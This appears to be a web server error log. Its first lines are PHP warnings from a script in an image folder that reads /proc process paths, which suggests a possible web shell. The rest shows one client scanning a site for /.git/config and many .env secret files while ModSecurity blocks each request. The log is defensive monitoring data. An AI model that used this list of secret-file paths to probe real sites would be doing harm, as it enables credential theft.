PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705334/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704675/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704675/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704675/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704675/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704675/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704675/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:58:42.621363 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:44.216532 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:44.706959 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:45.028349 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:45.597220 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:46.320373 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:47.857398 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:48.440666 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:48.887546 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:49.298511 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:50.224714 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:51.079239 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:51.631217 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:53.805186 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:54.257220 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:54.679043 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:55.113188 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:57.190633 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:58.069774 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:58.508033 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:58:59.051884 2026] [:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.558788 2026] [security2:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.git/config"] [unique_id "agHSlOSQ-m-m0ukSSht7_gAAAVg"]
[Mon May 11 14:59:00.559029 2026] [security2:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.git/config"] [unique_id "agHSlOSQ-m-m0ukSSht7_gAAAVg"]
[Mon May 11 14:59:00.559540 2026] [security2:error] [pid 1319953:tid 1319979] [client 5.255.107.253:59502] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.git/config"] [unique_id "agHSlOSQ-m-m0ukSSht7_gAAAVg"]
[Mon May 11 14:59:00.567539 2026] [security2:error] [pid 1320398:tid 1320408] [client 5.255.107.253:37364] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.staging"] [unique_id "agHSlOJEyNRN152ArOSEwAAAAEg"]
[Mon May 11 14:59:00.567718 2026] [security2:error] [pid 1320398:tid 1320408] [client 5.255.107.253:37364] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.staging"] [unique_id "agHSlOJEyNRN152ArOSEwAAAAEg"]
[Mon May 11 14:59:00.567932 2026] [security2:error] [pid 1320398:tid 1320408] [client 5.255.107.253:37364] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.staging"] [unique_id "agHSlOJEyNRN152ArOSEwAAAAEg"]
[Mon May 11 14:59:00.582440 2026] [:error] [pid 1320674:tid 1320711] [client 5.255.107.253:37254] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.600788 2026] [:error] [pid 1319998:tid 1320007] [client 5.255.107.253:37278] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.601011 2026] [security2:error] [pid 1319953:tid 1319978] [client 5.255.107.253:37316] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.example"] [unique_id "agHSlOSQ-m-m0ukSSht7_wAAAVc"]
[Mon May 11 14:59:00.601310 2026] [security2:error] [pid 1319953:tid 1319978] [client 5.255.107.253:37316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.example"] [unique_id "agHSlOSQ-m-m0ukSSht7_wAAAVc"]
[Mon May 11 14:59:00.601672 2026] [:error] [pid 1319885:tid 1319900] [client 5.255.107.253:37302] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.602050 2026] [security2:error] [pid 1319953:tid 1319978] [client 5.255.107.253:37316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.example"] [unique_id "agHSlOSQ-m-m0ukSSht7_wAAAVc"]
[Mon May 11 14:59:00.604107 2026] [security2:error] [pid 1320674:tid 1321055] [client 5.255.107.253:37312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env"] [unique_id "agHSlKO9RdIr1DwxYR2MvwAAAMw"]
[Mon May 11 14:59:00.604298 2026] [security2:error] [pid 1320674:tid 1321055] [client 5.255.107.253:37312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env"] [unique_id "agHSlKO9RdIr1DwxYR2MvwAAAMw"]
[Mon May 11 14:59:00.604525 2026] [security2:error] [pid 1320674:tid 1321055] [client 5.255.107.253:37312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env"] [unique_id "agHSlKO9RdIr1DwxYR2MvwAAAMw"]
[Mon May 11 14:59:00.603954 2026] [:error] [pid 1320398:tid 1320406] [client 5.255.107.253:37224] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.605755 2026] [security2:error] [pid 1319998:tid 1320019] [client 5.255.107.253:37332] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHSlKt2WtvoFr7xvGzOswAAAJM"]
[Mon May 11 14:59:00.605985 2026] [security2:error] [pid 1319998:tid 1320019] [client 5.255.107.253:37332] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHSlKt2WtvoFr7xvGzOswAAAJM"]
[Mon May 11 14:59:00.606130 2026] [security2:error] [pid 1319886:tid 1319908] [client 5.255.107.253:37354] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.old"] [unique_id "agHSlKy-5-wpj6Sx56aS6AAAAAY"]
[Mon May 11 14:59:00.606467 2026] [security2:error] [pid 1319998:tid 1320019] [client 5.255.107.253:37332] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHSlKt2WtvoFr7xvGzOswAAAJM"]
[Mon May 11 14:59:00.606562 2026] [security2:error] [pid 1319886:tid 1319908] [client 5.255.107.253:37354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.old"] [unique_id "agHSlKy-5-wpj6Sx56aS6AAAAAY"]
[Mon May 11 14:59:00.607280 2026] [security2:error] [pid 1319886:tid 1319908] [client 5.255.107.253:37354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.old"] [unique_id "agHSlKy-5-wpj6Sx56aS6AAAAAY"]
[Mon May 11 14:59:00.607628 2026] [:error] [pid 1319885:tid 1319915] [client 5.255.107.253:37264] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.607868 2026] [:error] [pid 1319953:tid 1319964] [client 5.255.107.253:37290] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.726004 2026] [:error] [pid 1320674:tid 1320695] [client 5.255.107.253:37418] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.731087 2026] [security2:error] [pid 1319886:tid 1319928] [client 5.255.107.253:37446] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.test"] [unique_id "agHSlKy-5-wpj6Sx56aS6QAAABI"]
[Mon May 11 14:59:00.731685 2026] [security2:error] [pid 1319886:tid 1319928] [client 5.255.107.253:37446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.test"] [unique_id "agHSlKy-5-wpj6Sx56aS6QAAABI"]
[Mon May 11 14:59:00.732272 2026] [:error] [pid 1319885:tid 1319927] [client 5.255.107.253:37426] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.732306 2026] [:error] [pid 1320674:tid 1320697] [client 5.255.107.253:37422] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.732308 2026] [:error] [pid 1319998:tid 1320018] [client 5.255.107.253:37424] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.732414 2026] [:error] [pid 1320398:tid 1320402] [client 5.255.107.253:37440] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 14:59:00.732581 2026] [security2:error] [pid 1319886:tid 1319928] [client 5.255.107.253:37446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.test"] [unique_id "agHSlKy-5-wpj6Sx56aS6QAAABI"]
[Mon May 11 14:59:00.733541 2026] [security2:error] [pid 1319953:tid 1319969] [client 5.255.107.253:37382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/admin/.env"] [unique_id "agHSlOSQ-m-m0ukSSht8AQAAAU4"]
[Mon May 11 14:59:00.733704 2026] [security2:error] [pid 1319953:tid 1319969] [client 5.255.107.253:37382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/admin/.env"] [unique_id "agHSlOSQ-m-m0ukSSht8AQAAAU4"]
[Mon May 11 14:59:00.734232 2026] [security2:error] [pid 1319953:tid 1319969] [client 5.255.107.253:37382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/admin/.env"] [unique_id "agHSlOSQ-m-m0ukSSht8AQAAAU4"]
[Mon May 11 14:59:00.838842 2026] [security2:error] [pid 1319885:tid 1319903] [client 5.255.107.253:37390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/backend/.env"] [unique_id "agHSlFchVQ3tCn0m9OpStAAAAQo"]
[Mon May 11 14:59:00.839072 2026] [security2:error] [pid 1319885:tid 1319903] [client 5.255.107.253:37390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/backend/.env"] [unique_id "agHSlFchVQ3tCn0m9OpStAAAAQo"]
[Mon May 11 14:59:00.839536 2026] [security2:error] [pid 1319885:tid 1319903] [client 5.255.107.253:37390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/backend/.env"] [unique_id "agHSlFchVQ3tCn0m9OpStAAAAQo"]
[Mon May 11 14:59:00.843910 2026] [security2:error] [pid 1319886:tid 1319917] [client 5.255.107.253:37346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/.env.bak"] [unique_id "agHSlKy-5-wpj6Sx56aS6wAAAAw"]
[Mon May 11 14:59:00.844375 2026] [security2:error] [pid 1319886:tid 1319917] [client 5.255.107.253:37346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "domaine-de-janasse.com"] [uri "/.env.bak"] [unique_id "agHSlKy-5-wpj6Sx56aS6wAAAAw"]
[Mon May 11 14:59:00.845531 2026] [security2:error] [pid 1319886:tid 1319917] [client 5.255.107.253:37346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "domaine-de-janasse.com"] [uri "/.env.bak"] [unique_id "agHSlKy-5-wpj6Sx56aS6wAAAAw"]
[Mon May 11 14:59:01.497678 2026] [security2:error] [pid 1319998:tid 1320002] [client 5.255.107.253:37400] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agHSlat2WtvoFr7xvGzOtgAAAII"]
